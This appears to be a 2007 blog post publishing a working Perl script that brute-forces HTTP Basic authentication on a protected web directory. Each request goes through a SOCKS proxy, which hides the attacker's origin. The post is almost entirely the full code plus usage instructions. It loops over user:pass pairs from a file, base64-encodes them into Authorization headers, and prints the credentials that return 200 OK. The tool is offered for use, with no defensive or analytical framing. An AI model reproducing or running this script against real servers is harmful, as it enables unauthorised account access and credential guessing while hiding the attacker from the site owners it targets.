Sunday, October 14, 2007

HTTP Basic auth brute forcer that connects via a socks proxy

socks.pl is a perl script that connects to a socks proxy and try's every user and password in the file given against a protected web directory.

Modules needed IO::Socket::Socks, MIME::Base64 and Getopt::Std

Usage:
perl socks.pl -s SOCKS_PROXY -d WEB_DIR -f USER_FILE -i WEB_SERVER -p PROXY_PORT -P WEB_SERVER_PORT

USER_FILE Format:
User:Pass

References:
RFC1945

use IO::Socket::Socks;
use MIME::Base64;
use Getopt::Std;
use strict;

sub setOpts {

    my $optString='s:p:f:d:i:P:';
    my %opt;

    my %configHash;

    if($#ARGV >=11) {
        getopts($optString,\%opt) or printError("Error on use $0 -s Proxy Server -d Protected File  -f User and Password File -p proxyport -i Web Server IP -P Web Server Port");
        $configHash{'PServer'}=$opt{'s'} if(defined($opt{'s'}));
        $configHash{'PPort'}=$opt{'p'} if(defined($opt{'p'}));
        $configHash{'SIP'}=$opt{'i'} if(defined($opt{'i'}));
        $configHash{'SPort'}=$opt{'P'} if(defined($opt{'P'}));
        $configHash{'Sdir'}=$opt{'d'} if(defined($opt{'d'}));
        $configHash{'IDfile'}=$opt{'f'} if(defined($opt{'f'}));

    }
    else {
        printError("Error on use $0 -s Proxy Server -d Protected File  -f User and Password File -p proxyport -i Web Server IP -P Web Server Port");

    }
    return %configHash;
}

sub connectProxy {

    my %configHash=@_;
    $configHash{'sock'} = new IO::Socket::Socks(ProxyAddr=>$configHash{'PServer'}, 
                                                ProxyPort=>$configHash{'PPort'}, 
                                                ConnectAddr=>$configHash{'SIP'},
                                                ConnectPort=>$configHash{'SPort'}) or die($!);
    return %configHash;

}

sub printError {
 my $errorMsg=$_[0];

 print STDERR $errorMsg."\n";
 exit();
}

sub checkFile {
 my $fileName=$_[0];
 printError("Please check file $fileName") if (! -f $fileName);

}

sub loadFile { my %configHash=@_;
 open(USER,'<',$configHash{'IDfile'}) or printError("$! on file $configHash{'IDfile'}");

}


sub convUserPass{
    my %configHash=@_;

    $configHash{'encUserPass'}=encode_base64($configHash{'userInfo'});

    return %configHash;

}

sub logIN {
    my %configHash=@_;

    while(<USER>) {
        %configHash=connectProxy(%configHash);
        $configHash{'userInfo'}=$_;

        chomp($configHash{'userInfo'});
        %configHash=convUserPass(%configHash);

        my $socks=$configHash{'sock'};

        print $socks "GET ".$configHash{'Sdir'}." HTTP/1.0\nHost: localhost\nAuthorization: Basic ".$configHash{'encUserPass'}."\n\n";

        my $rsp;
        $socks->read($rsp,15);

        print $configHash{'userInfo'}."\n" if($rsp eq 'HTTP/1.1 200 OK');

    }
}

sub closeProxy {
    my %configHash=@_;

    %configHash=connectProxy(%configHash)->close();
}

sub init {

    my %configHash=setOpts();

    checkFile($configHash{'IDfile'});
    loadFile(%configHash);

    logIN(%configHash);

}
init();
Posted by at
Labels:

No comments:

Post a Comment

Subscribe to: Post Comments (Atom)